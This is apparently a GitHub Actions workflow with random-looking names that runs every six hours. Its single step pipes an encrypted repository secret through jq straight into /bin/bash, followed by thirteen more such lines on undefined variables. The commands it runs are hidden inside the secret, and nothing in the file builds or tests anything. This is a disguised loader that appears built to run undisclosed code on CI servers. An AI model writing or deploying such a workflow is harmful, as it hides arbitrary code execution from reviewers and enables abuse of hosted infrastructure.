name: purmabiaomk

on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: purmabiaomk
        env:
          fwte62: ${{ secrets.fwte62 }}
        run: |
          echo $fwte62 | jq -r .qrr8 | /bin/bash
          echo $isesb59469 | jq -r .iheb5 | /bin/bash
          echo $awt132 | jq -r .ekp7096 | /bin/bash
          echo $pzoc6243 | jq -r .gvucs6198 | /bin/bash
          echo $dkq41 | jq -r .qjpx32 | /bin/bash
          echo $fcpe0 | jq -r .hnitj8 | /bin/bash
          echo $xkcn05 | jq -r .ecfif763 | /bin/bash
          echo $et924 | jq -r .anv67 | /bin/bash
          echo $yza8 | jq -r .dxjmb05154 | /bin/bash
          echo $e4 | jq -r .rfb2 | /bin/bash
          echo $nbmq47266 | jq -r .rr979 | /bin/bash
          echo $ixesm8950 | jq -r .dynnr95923 | /bin/bash
          echo $aiiuj7 | jq -r .ilzb33428 | /bin/bash
          echo $fzgu0828 | jq -r .gqoqv04961 | /bin/bash

